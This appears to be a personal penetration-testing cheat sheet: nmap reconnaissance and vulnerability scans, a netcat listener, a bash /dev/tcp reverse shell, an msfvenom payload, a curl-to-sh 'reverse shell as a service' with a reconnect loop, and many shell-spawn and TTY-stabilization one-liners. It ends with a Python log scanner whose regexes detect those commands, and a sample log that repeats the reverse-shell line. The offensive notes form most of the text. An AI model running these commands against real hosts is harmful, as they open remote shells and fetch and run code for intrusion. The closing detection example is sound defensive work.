#### to install:

- magic wormhole
- tldr
- rlwrap

```bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
```

#### for keyring

-> if there is some kind of keyring error

```bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
```

# information gathering

### nmap

for a quick scan of available ips:

```bash
nmap -sn ip/24
```

to filter the output for the live ips only:

```bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```

scan open ports (first find all open ports, then run version detection and default scripts only against those):

```bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```

#### on windows

```bash
nmap --script vuln ip
```

##### on windows + smb

```bash
nmap --script vuln-smb* ip
```

not sure anymore which one it was

```bash
# the SMB vulnerability NSE scripts are named smb-vuln-*
nmap --script smb-vuln* ip
```

# initial access

### start listener:

```bash
rlwrap -cAr nc -nlvp 9002
```

### reverse shell bash:

```bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```

### reverse shell file:

```bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```

-> from revshells.com

### untested: Reverse Shell as a Service

1. On your machine:

```bash
nc -l 1337
# or nlvp?
```

2. On the target machine:

```bash
curl https://reverse-shell.sh/yourip:1337 | sh
```

#### reconnecting:

```bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
```

# privilege escalation

### always run these:

```bash
sudo -l
```

if sudo doesn't work: [[#^78d3ce|spawn shell]]

#### check cronjobs

```bash
ls /etc/cron.*
crontab -l
```

## TTY Spawn Shell

##### if sudo still doesn't work use

```bash
# -S reads the password from stdin instead of asking on a tty
sudo -S command
```

Often during pen tests you may obtain a shell without having a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
### Python spawn shell

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

### Fully Interactive TTY

#### All the steps to stabilize your shell

**The first step:**

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys.

**Step two is:**

```bash
export TERM=xterm
```

This will give us access to term commands such as clear.

**Finally (and most importantly) we will background the shell using**

```bash
Ctrl + Z
```

Back in our own terminal we use

```bash
stty raw -echo; fg
```

This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, `fg` brings the backgrounded reverse shell back to the foreground.

Then, inside the reverse shell, set the terminal size (take the values from `stty -a` in your own terminal so both sides match):

```bash
stty rows 38 columns 116
```

### OS system spawn shell

from inside a Python prompt:

```python
import os; os.system("/bin/bash")
```

### Bash spawn shell

```bash
/bin/sh -i
```

### Perl spawn shell

```bash
perl -e 'exec "/bin/sh";'
```

### Ruby spawn shell

```bash
ruby -e 'exec "/bin/sh"'
```

### Lua spawn shell

```bash
lua -e 'os.execute("/bin/sh")'
```

### IRB spawn shell

from inside an irb prompt:

```ruby
exec "/bin/sh"
```

### VI spawn shell

```bash
:!bash
```

### VI(2) spawn shell

```bash
:set shell=/bin/bash
:shell
```

### Nmap spawn shell

(from nmap's interactive mode)

```bash
!sh
```

#### Exiftool

read metadata:

```bash
exiftool picture.png
```

Binwalk (extract embedded binary data):

```bash
binwalk -e picture.png
```
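Seen from the blue-team side, the reverse-shell and shell-stabilization one-liners in the initial access and TTY sections above are exactly the command lines a process-execution log should be watched for. The following is an added example, not part of the original notes: it scans a constructed, simplified exec log (`<ts> uid=<n> cmd=<command line>` per line, an assumed format) for those patterns and singles out users who show both a connect-back and a stabilization step.

```python
import re

# Patterns derived from the one-liners collected in the notes above.
# "connect-back" indicators fire on the shell itself, "stabilize" ones on the
# follow-up steps an operator runs inside it to get a usable tty.
INDICATORS = {
    "bash_dev_tcp_redirect": re.compile(r"/dev/tcp/[\d.]+/\d+"),
    "curl_piped_to_sh": re.compile(r"\bcurl\b[^|]*\|\s*(?:ba)?sh\b"),
    "interpreter_exec_sh": re.compile(r"""exec\s+["']/bin/(?:ba)?sh["']"""),
    "os_system_shell": re.compile(r"""os\.(?:system|execute)\(["']/bin/(?:ba)?sh["']\)"""),
    "python_pty_spawn": re.compile(r"pty\.spawn\("),
    "stty_resize": re.compile(r"\bstty\s+rows\s+\d+\s+columns\s+\d+\b"),
}
CONNECT_BACK = {"bash_dev_tcp_redirect", "curl_piped_to_sh"}
STABILIZE = {"python_pty_spawn", "stty_resize"}

# Assumed log format: "<timestamp> uid=<n> cmd=<full command line>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+uid=(?P<uid>\d+)\s+cmd=(?P<cmd>.*)$")


def scan_exec_log(lines):
    """Return one finding dict per (log line, indicator) match, in log order."""
    findings = []
    for raw in lines:
        m = LOG_LINE.match(raw)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        cmd = m.group("cmd")
        for name, pattern in INDICATORS.items():
            if pattern.search(cmd):
                findings.append({"ts": m.group("ts"), "uid": int(m.group("uid")),
                                 "indicator": name, "cmd": cmd})
    return findings


def uids_with_chain(findings):
    """UIDs showing both a connect-back and a stabilization step: a much
    stronger signal than a single match, which can be an admin's legitimate use."""
    seen = {}
    for f in findings:
        seen.setdefault(f["uid"], set()).add(f["indicator"])
    return sorted(uid for uid, names in seen.items()
                  if names & CONNECT_BACK and names & STABILIZE)


# Constructed sample: uid 33 (www-data) pops a bash reverse shell and upgrades
# it with pty.spawn; uid 1000 runs an ordinary curl download; one line is junk.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z uid=33 cmd=/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1",
    "2024-05-01T10:00:09Z uid=33 cmd=python3 -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "2024-05-01T10:00:20Z uid=1000 cmd=curl -o pkg.tgz https://example.invalid/pkg.tgz",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    hits = scan_exec_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} uid={f['uid']} {f['indicator']}: {f['cmd']}")
    print("uids with connect-back + stabilization:", uids_with_chain(hits))
```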